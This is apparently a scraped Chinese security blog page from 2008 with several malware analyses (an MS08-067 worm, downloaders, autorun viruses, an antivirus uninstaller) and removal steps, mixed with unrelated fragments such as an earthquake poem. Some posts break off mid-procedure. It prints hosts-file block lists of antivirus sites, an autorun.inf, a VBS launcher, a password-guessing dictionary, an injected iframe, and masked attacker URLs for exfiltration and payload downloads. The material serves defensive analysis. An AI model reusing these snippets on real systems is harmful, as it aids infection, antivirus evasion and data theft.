一个值得纪念的日子，世界上几乎所有的网站都被“挂马” 包括GOOGLE 百度 搜狐 新浪 等等著名网站无一幸免～～

截图留念

23:20分左右 全世界的网站被同时清除了“网马”～～ 感谢GOOGLE

免费的技术培训，快来哦～～

e.每隔15分钟启动一次本机的lanmanserver与Browser服务，扫描本网段内的其他机器，打开对方的4444端口。在本机临时文件夹内创建一个???????.txt的文件（?代表随机数字），并写入一些代码，利用批处理和debug将其“重组”成dll文件，利用rundll32.exe加载，并利用MS08-067漏洞攻击其他机器，同时将该病毒文件复制过去。

f.释放appwinproc.dll到系统目录，设置窗口挂钩，查找带有如下字样的窗口“金山毒霸，360安全卫士, 江民, 木马, 专杀,下载者，NOD32，卡巴斯基…”，找到后调用TerminateProcess函数结束相应进程。

g.修改hosts文件屏蔽常见安全网站

127.0.0.1 www.360.cn

127.0.0.1 www.360safe.cn

127.0.0.1 www.360safe.com

127.0.0.1 www.chinakv.com

127.0.0.1 www.rising.com.cn

127.0.0.1 rising.com.cn

127.0.0.1 dl.jiangmin.com

127.0.0.1 jiangmin.com

127.0.0.1 www.jiangmin.com

127.0.0.1 www.duba.net

127.0.0.1 www.eset.com.cn

127.0.0.1 www.nod32.com

127.0.0.1 shadu.duba.net

127.0.0.1 union.kingsoft.com

127.0.0.1 www.kaspersky.com.cn

127.0.0.1 kaspersky.com.cn

127.0.0.1 virustotal.com

127.0.0.1 www.kaspersky.com

127.0.0.1 www.cnnod32.cn

127.0.0.1 www.lanniao.org

127.0.0.1 www.nod32club.com

127.0.0.1 www.dswlab.com

127.0.0.1 bbs.sucop.com

127.0.0.1 www.virustotal.com

127.0.0.1 tool.ikaka.com

127.0.0.1 360.qihoo.com

h.向除了A,B盘之外的盘符中创建autorun.inf和system.dll(即dll??.dll),

autorun.inf内容如下：

[autorun]

shell\open\command=rundll32 system.dll,explore

shell\explore\command=rundll32 system.dll,explore

利用rundll32.exe加载该dll

i.获得本机的mac地址，操作系统版本等信息发送到http://tk123.********.cn/pk/123/count.asp

判别方法：通过sreng日志判断：

1.       IFEO项目可以看到很多杀毒软件被劫持

2.       查看系统服务发现如下服务的dll版本变为N/A(被病毒替换所致)

如[Application Management / AppMgmt][Stopped/Manual Start]

<C:\WINDOWS\system32\svchost.exe -k netsvcs-->%SystemRoot%\System32\appmgmts.dll><N/A>

[Task Scheduler / Schedule][Stopped/Auto Start]

<C:\WINDOWS\System32\svchost.exe -k netsvcs-->%SystemRoot%\system32\schedsvc.dll><N/A>

[System Restore Service / srservice][Stopped/Auto Start]

<C:\WINDOWS\system32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\srsvc.dll><N/A>

[Windows Image Acquisition (WIA) / stisvc][Stopped/Manual Start]

<C:\WINDOWS\system32\svchost.exe -k imgsvc-->%SystemRoot%\system32\wiaservc.dll><N/A>

[Windows Time / W32Time][Stopped/Auto Start]

<C:\WINDOWS\System32\svchost.exe -k netsvcs-->C:\WINDOWS\system32\w32time.dll><N/A>

解决方法：

下载sreng工具,XDelbox工具。

1.       断开网络，开始—运行—输入services.msc，把下列服务设置为“禁用”：Application Management，Task Scheduler，System Restore Service，Windows Image Acquisition (WIA)，Windows Time

2.       使用Xdelbox删除如下文件

%temp%\dll???.dll（???代表随机数字）

%SystemRoot%\System32\Nskhelper2.sys

%SystemRoot%\System32\NSPASS?.sys (?代表数字，不止一个)

%SystemRoot%\System32\appwinproc.dll

以及各个分区下面的system.dll,autorun.inf文件

3.重启计算机，打开我的电脑>>菜单栏>>工具>>文件夹选项>>查看

选择显示所有文件和文件夹，并把隐藏受保护的操作系统文件的钩去掉。

作者：清新阳光                                                            ( http://hi.baidu.com/newcenturysun)
日期：2008/11/26                                                         (转载请保留此声明)

这是一个结合了机器狗，AV终结者和利用MS08067漏洞攻击的复合型下载者病毒，近几天非常流行，并且预计该病毒在近期会成泛滥之势，希望大家注意！

以下是该病毒的某一变种的分析：

打了之前的几个“波”的补丁均无效，因此怀疑利用MS08-067漏洞的蠕虫已经出现，各位务必即时打好补丁！

关于该补丁的介绍可以参考http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx通过下面的表格中查找对应你的操作系统的补丁文件 下载安装上 重启计算机。

XPSP2和XPSP3的用户 可以直接到这个地址下载补丁http://www.microsoft.com/downloads/details.aspx?FamilyID=0d5f9b6e-9265-44b9-a376-2067b73d6a03&DisplayLang=zh-cn

安装卡卡助手的用户可以直接通过卡卡助手打上这个补丁：

方法：请打开卡卡上网助手
点击首页“漏洞扫描与修复”下的“立即启动”按钮

之后按照提示将扫到的补丁都装上即可

部分奖品展示：

这是一个具有多种传播功能和反杀毒软件功能的下载者病毒，传播方式新颖独特，需要严密防范！

下面是该病毒的详细分析报告：

病毒初始化过程：
1.创建一个互斥量：中华吸血鬼2.2
2.删除SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}

3.释放如下副本或文件：
%systemroot%\Tasks\绿化.bat
%systemroot%\Tasks\csrss.exe
%systemroot%\Tasks\wsock32.dll

4.之后创建很多线程，执行多种病毒功能：

(1)通过GetWindowTextA函数获得窗口标题，并比较是否含有如下字样
worm
卡巴斯基
江民
金山
Anti
anti
Virus
virus
Firewall
Mcafee
查杀
主动防御
微点
系统保护
主 动
主动
杀马
木马
上报
举 报
举报
进 程
进程
系统安全
Process
NOD32
专 杀
专 杀
专杀
安全卫士
绿鹰
...

如果含有则使用PostMessage函数会发送消息给他们：
首先发送一个WM_Destroy，之后发送两个WM_Close 最后发一个WM_Destroy 的消息。并把窗口标题名保存下来。
之后会调用Messageboxa函数弹出一个标题为"Windows盗版验证为"的窗口 并显示如下字样“安全提示：您正在使用的(刚刚获得的窗口标题名称)是盗版软件，可能您是盗版软件的受害者，为了给合法用户提供保证，我们无法继续给您提供服务，请到指定销售商购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com”

(2) 破坏冰刃
查找类名为Afxcontrolbar423s的窗口
然后发送WM_Close关闭 再模拟键盘输入按一下回车键

(3) U盘传播功能
检测可移动存储中是否有autorun.inf文件，如果有将其改名
之后向里面写入autorun.inf
创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹，在该文件夹内写入GHOSTBAK.exe（病毒文件）

(4) 病毒感染统计
搜集被感染主机的mac地址，并把被感染主机的mac地址和感染的病毒版本发送给http://www.*******.cn/tj/ct.asp页面

(5) 修改hosts文件
获得%programfiles%的环境变量，接着查找\\drivers\etc\\hosts文件
写入如下数据：
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 www.qihoo.com
127.0.0.1 www.qihoo.cn
127.0.0.1 124.40.51.17
127.0.0.1 58.17.236.92
127.0.0.1 www.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com

每1秒循环一次

(6) 遍历进程，调用Terminate Process函数结束如下进程：
AST.exe
360tray.exe
ast.exe
FWMon.exe

(7) 遍历磁盘文件删除扩展名为gho,GHO,Gho的文件

(8) arp欺骗功能
获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象
由系统目录下的arps.com执行%s -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗

(9) 局域网弱密码猜解传播
以administrator为用户名，对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中，以hackshen.exe
病毒猜解的密码字典如下：
woaini
baby
asdf
NULL
angel
asdfgh
1314520
5201314
caonima
88888
bbbbbb
12345678
memory
abc123
qwerty
123456
password
enter
hack
xpuser
money
yeah
time
game
user
home
alex
guest
admin
test
administrator
movie
root
love

(10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键
释放一个hackchen.vbs到%systemroot%\Tasks
hackchen.vbs内容：
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\csrss.exe",0
并且注册HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK} 指向%systemroot%\Tasks\hackchen.vbs

(11) 病毒自动更新功能。在系统目录下释放meupdate.ini文件，并且和http://www.*******.cn/22.txt做比较，如果不同则下载http://www.*******.cn/server.exe（最新版病毒程序）到c:\_default.pif，并且每600ms执行一次

(12)通过查找%ProgramFiles%的环境变量获得程序文件夹路径，之后查找\\WinRAR\\Rar.exe获得winrar安装路径。
遍历所有分区的.rar,.zip,.tgz,.cab,.tar文件 找到后
后台调用winrar执行"（winrar路径）" -ep a "（找到的rar等文件路径）" %systemroot%\Tasks\绿化.bat 命令
将绿化.bat压缩进压缩包，绿化.bat即为病毒本身，诱使用户点击中毒。

(13)（此方法十分新颖）
遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下
当该文件夹下的exe文件的导入表含有wsock32.dll的时候，会首先调用同文件夹下的wsock32.dll，也就是病毒释放的文件。此时会从下载http://www.*******.cn/server.exe（病毒最新版本）并执行！！！

(14) 查找某些类名为#32770的窗口，并且试图发送"我做了快一个月了,每天2个小时有40-50元的收入,你也来看看吧,长期大量招聘网络兼职http://www.*******.cn/jianzhi.htm"的消息给对方(应该是通过QQ之类的聊天工具传播)

(15) 遍历非系统分区的html,aspx，htm等文件 写入iframe代码

(16)下载木马功能
下载http://www.*******.cn/ft/qq.exe
http://www.*******.cn/cj/qq.exe
并执行

清除方法不作赘述，安全模式下清理所有文件夹下的wsock32.dll，
并利用工具清理%systemroot%\Tasks\绿化.bat
%systemroot%\Tasks\csrss.exe
并打开所有压缩包文件 删除里面的绿化.bat。
最后使用杀毒软件全盘杀毒

这也是一个浩大的工程吧~~

综观此病毒有很多新颖之处，首先是在关闭杀软之后弹出窗口，容易给不知情者以迷惑；其次病毒释放的wsock32.dll会使得任意该目录下的exe文件成为下载病毒文件的傀儡；再次由于windows的某些保护，tasks目录下的文件无法直接看到，这又给病毒了一个绝佳的藏身之地；最后，病毒还会将自己压缩到压缩包中，起一个诱惑的名字诱使用户再次中毒。

最近恶性病毒以及木马群肆虐，但此类行为特征新颖的病毒也有所猖獗，望大家做好防范！

<iframe src=http://www.******.info/hao4.htm width=100 height=1></iframe>    

请注意，暂时不要访问cnbeta~

突然

天摇地晃

沉默 随即是各种奔跑

醒悟 原来是地震来临

里氏7.8 远在千里之外的汶川

下午2点半 波及前所未有的全国

灾难 又是一场灾难

救援 又是一次救援

汶川告急 四川告急 全国告急

几所教学楼 瞬间倒塌 几千学生被埋

几处住院部 分崩离析 几百患者撤离

无数办公楼 裂缝晃动 上万上班族逃难

成都彻夜未免

都江堰紧急预警

汶川震中迄今无法进入

上万死亡

三万受伤

甘肃 陕西 重庆

死亡人数不断攀升

德阳 绵阳 北川 成都

救灾工作立刻开展

温家宝赶赴灾区

胡锦涛重要指示

各省的医疗队随时准备待命

我们的子弟兵再一次出发了

捐款 捐物 抗险 救灾

献血车前排起长队

绿帐篷里安顿灾民

大雨突然下起 余震依然不断

灾区人民 你们受苦了

人的生命只有一次

此刻显得极为珍贵

我们知道你们的苦

我们也知道你们的伤

人死已然无法复生

但 但凡能够救活的我们还要继续

家园已经一片废墟

但 只要万众一心一定能够重建

在你们的背后

是全国人民的关注和关心

在你们的背后

是全国人民的援助和救灾

空降兵来了

救援队来了

医疗队来了

武警官兵都来了

水来了 衣服来了 食物来了 帐篷也来了

雪灾 我们扛过去了

洪水 我们扛过去了

这次 我们同样可以扛过去

在灾难面前

中国人民从来不会低头

只要有一线希望

我们就要尽百倍努力

决不放松

只要我们众志成城

中国人民就不可战胜

天佑中华！

样本来自网友qcqyt，在此表示感谢

这是一个使用VB编写的病毒。可以通过U盘等移动存储传播。修改可执行文件图标，映像劫持杀毒软件...

1.病毒启动后，释放如下文件或者副本
%systemroot%\system32\soleboy.exe
%systemroot%\system32\soleboy.txt

各个分区根目录下生成soleboy.exe和autorun.inf达到随移动存储传播的目的。

2.试图结束一些安全工具的进程
比如procexp.exe
U盘病毒免疫器
avgnt.exe
Psview.exe
PowerRmv.exe
ToolsLoader.exe
FrameworkService.exe
...

3.映像劫持如下杀毒软件和安全工具：
360Safe.exe
360tray.exe
ACAAS.exe
ACAEGMgr.exe
ACAIS.exe
ACALS.exe
ACASP.exe
ACenter.exe
AFMain.exe
AGB6.EXE
AGBKrnl.exe
AhnSD.exe
AhnSDsv.exe
AluSchedulerSvc.exe
AScheduleService.exe
AST.exe
avcenter.exe
avgnt.exe
avguard.exe
CCenter.exe
ccSvcHst.exe
FilMsg.exe
FrameworkService.exe
KASMain.exe
KAV32.exe
KVIETools.exe
kvsrvxp.exe
KWatch.exe
mcconsol.exe
Mcshield.exe
MPMain.exe
MPMon.exe
MPSVC.exe
MPSVC1.exe
MPSVC2.exe
MSProxy.ahn
naPrdMgr.exe
nod32krn.exe
nod32kui.exe
PCCIOMON.EXE
PCCVScan.exe
PCMAIN.EXE
PowerRmv.exe
psview.exe
Rav.exe
RavMonD.exe
sched.exe
sessmgr.exe
shstat.exe
SnipeSword.exe
TRIALMSG.exe
Twister.exe
vcn.exe
vcs.exe
vcw.exe
VsTskMgr.exe
劫持到%systemroot%\system32\soleboy.exe

4.添加注册表启动项目HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\soleboy: "%systemroot%\system32\soleboy.exe"达到开机启动自身的目的

5.修改com和exe文件的文件关联指向soleboy.exe
HKLM\SOFTWARE\Classes\comfile\shell\open\command\: "soleboy.exe "%1" %*"
HKLM\SOFTWARE\Classes\exefile\shell\open\command\: "soleboy.exe "%1" %*"

6.修改exe的图标关联 指向soleboy.exe，使得所有exe图标变成小狗图案。
HKEY_CLASSES_ROOT\exefile\DefaultIcon: "soleboy.exe"

7.查找带有如下字样的窗口，找到后利用sendmessage函数发送WM_CLOSE命令关闭窗口
瑞星反病毒资讯网 [信息安全 源自瑞星] - Windows Internet Explorer
Windows 任务管理器
注册表编辑器
江民进程查看器
欢迎光临江民科技[网络安全，选择江民] - Windows Internet Explorer
金山毒霸信息安全网－免费下载杀毒软件 - Windows Internet Explorer
卡巴斯基实验室: 反病毒软件,反间谍程序,垃圾邮件过滤 - Windows Internet Explorer
360安全卫士－Windows Internet Explorer
防病毒、反间谍软件、端点安全、备份、存储和遵从解决方案－赛门铁克公司－Windows Internet Explorer
大型企业 - 趋势科技 中国 - Windows Internet Explorer
东方微点 - Windows Internet Explorer
...

8 删除%systemroot%\system32\taskkill.exe

9.作者在soleboy.txt中写道：

I want to go to university.
I think Jiangmin Antivirus Software is the best security software!
Don't worry ,I won't destroy your data.

解决方法：
下载sreng，Icesword
sreng:http://www.skycn.com/soft/23312.html#download
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip

已经安装winrar的请打开winrar的安装路径 找到winrar.exe 把他改名为winrar.bat双击运行

然后单击winrar菜单栏“文件”按钮 打开压缩文件

这是之前流行的“水牛”病毒的最新变种，新变种的技术较以前有了较大进步，具有恢复SSDT，挂系统钩子隐藏自身文件和注册表项目等多种新功能，普通用户难以捕捉到他的行踪...

下面是病毒的简单分析：
File: nwizs.exe
Size: 56905 bytes
Modified: 2008年3月19日, 11:42:20
MD5: 9611CE48C43E845D0424FDDB45ADF29F
SHA1: 24E5A9A0558F95349D64FB6B985043B9B3382140
CRC32: F72FC4BC

1.病毒初始化,释放驱动文件覆盖系统中的%systemroot%\system32\drivers\Beep.sys，该驱动用于恢复SSDT。

2.释放如下文件或者副本
%systemroot%\system32\Hook_nwizs.dll
%systemroot%\system32\nwizs.exe
各个分区下释放nwizs.exe 和autorun.inf文件

其中Hook_nwizs.dll挂钩FindNextFile，NtEnumerateValueKey等函数隐藏自身文件和注册表启动项目，使得在资源管理器和注册表编辑器中无法看到其行踪（包括sreng）

之后会启动两个空壳的svchost.exe 并使用Writeprocessmemory 函数将病毒代码写入进去。且两个svchost.exe互相守护。

3.添加启动项目开机启动自身

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
<nwizs><C:\WINDOWS\system32\nwizs.exe>

4.添加IFEO映像劫持很多安全软件，诸如：
360rpt.exe
360Safe.exe
360tray.exe
adam.exe
AgentSvr.exe
AppSvc32.exe
autoruns.exe
avgrssvc.exe
avp.exe
avp.com
CCenter.exe
ccSvcHst.exe...

5.删除如下注册表键破坏安全模式
SYSTEM\ControlSet001\Control\SafeBoot\Minimal\
SYSTEM\ControlSet001\Control\SafeBoot\Network\
SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\

6.关闭带有指定字样的窗口，诸如：
江民
金山毒霸
诺顿
卡巴
瑞星
木马
病毒
杀毒
杀软
专杀
组策略
防火墙
360安全卫士
...

7.修改注册表禁用任务管理器，破坏显示隐藏文件

8.启动IE下载木马和病毒文件
下载地址：http://*****.cn/dir/index_pic/mm/microsoft.exe
http://*****.cn/dir/index_pic/mm/cq.exe
http://*****.cn/dir/index_pic/mm/wow.exe
到%temp%文件夹下面

9.释放批处理删除自身

解决方法：
由于此病毒在资源管理器和注册表编辑器（包括常用工具sreng中均不可见）所以我们可以先借助Icesword恢复病毒挂的钩子再进行其他操作

需要下载的工具 Icesword1.22版本和processexplorer

1.打开processexplorer
查找两个互相守护的svchost.exe进程，记住他们的PID

最近出现了一些通过调用杀毒软件的卸载程序后台自动卸载杀毒软件的病毒，希望大家注意，下面是某个类似病毒的简单分析何针对此类病毒的防范。

File: NTDUBECT.EXE
Size: 117760 bytes
Modified: 2008年3月1日, 9:11:10
MD5: 1AB6A852EF767FDBB43A4624DA973691
SHA1: 8B5D305B6E50E884B57F9FB72BDF329717ACB904
CRC32: 1A37BB79

1.病毒启动后，调用RegOpenKeyEx函数打开HKEY_LOCAL_MACHINE\SOFTWARE\rising\Rav键，之后利用RegQueryValueEx函数获得该键下面的installpath信息，即瑞星的安装路径。之后会在后台启动瑞星安装目录下Update\Setup.exe的卸载程序，成功启动后，会查找类名为Button，窗口为卸载(&U)的窗口，然后PostMessage发送消息，接着查找名为“下一步(&N)”的窗口，再PostMessage模拟用户按键发送消息，这样就完成了模拟卸载的过程。

2.其他行为
调用cmd.exe执行net stop "Security Center"
net stop "Windows Firewall/Internet Connection Sharing (ICS)"
和net stop System Restore Service的命令

关闭安全中心，Windows个人防火墙和系统还原

3.在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run下面添加
"Wingin" = %SYSTEM%\WINGIN.EXE的项目达到开机启动自身的目的

4.另外该病毒会生成如下文件
%systemroot%\system32\knlExt.dll
%systemroot%\system32\Drivers\usbKeyInit.sys
%systemroot%\system32\Wingin.exe

可能由于病毒本身的bug问题,病毒没有运行成功

随着杀毒软件进入了主动防御时代,传统的在ring3级别结束杀毒软件的技术已经逐渐失效，而病毒作者又想出了利用杀毒软件的卸载功能自动卸载杀毒软件这一狠招！因此我们应该严密防范病毒利用此种办法破坏杀毒软件，具体到瑞星杀毒软件，可以利用瑞星主动防御里面的程序启动控制来防范，如图：
打开瑞星杀毒软件主动防御设置界面－程序启动控制 并按照图示设置即可

这是一个用VB编写的病毒，行为有点类似落雪，处理起来比较麻烦，没有下载行为，作者的目的似乎只是为了炫耀自己的技术

具体分析：
File: Nitip.exe
Size: 47616 bytes
File Version: 1.00
Modified: 2008年2月28日, 12:04:14
MD5: A1E036A64AFDD8F89B434CC03F418867
SHA1: 553DDACA9B5CEEF95EA4D265D35069C3459BA4EC
CRC32: 386A5FAD

1.病毒伪装成文件夹图案诱使用户点击
运行后，衍生如下文件或者副本：
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\CSRSS.EXE
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\LSASS.EXE
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SERVICES.EXE
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\SMSS.EXE
C:\Documents and Settings\用户名\Local Settings\Application Data\WINDOWS\WINLOGON.EXE
C:\Documents and Settings\用户名*****.exe（*****代表随机字符）
C:\dago\****.exe（****代表随机字符）
C:\***** 用户名.exe（*****代表随机字符）
C:\WINDOWS.exe
C:\WINDOWS\system32\\Media\Windows.cmd
C:\WINDOWS\User\.exe
C:\WINDOWS\system\server.exe
C:\WINDOWS\Dago\Dago.exe

各个分区下面生成一个Dago的文件夹和一个***** 用户名.exe（*****代表随机字符）生成的病毒体

2.试图删除下面目录中的文件
C:\Progra~1\AntiViralToolkitPro\*.*
C:\Norman\*.*
C:\Progra~1\Norman\*.*
C:\Progra~1\Mcafee\McafeeVirusScan\*.*
C:\Progra~1\NortonAntiVirus\*.*
C:\Progra~1\NetworkAssociates\Virusscan\*.*
C:\Progra~1\NetworkAssociates\Virusscan\*.*
C:\windows\system32\gpedit.msc
C:\Program Files\Kaspersky Lab\KasperskyAnti-VirusPersonal Pro\*.*
C:\Program Files\Kaspersky Lab\KasperskyAnti-VirusPersonal\*.*

3.添加映像劫持项目
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe
劫持到

4.操作注册表，禁用注册表编辑器，任务管理器，cmd等常用工具，并隐藏“文件夹选项”，隐藏文件扩展名
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr: 0x00000001
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableRegistryTools: 0x00000001
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions: 0x00000001
HKU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD: 0x00000001
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt: 0x00000001

之前释放了C:\WINDOWS.exe，而且把真正的C:\WINDOWS目录隐藏了，用户则很容易会点击伪装的Windows文件夹（病毒文件）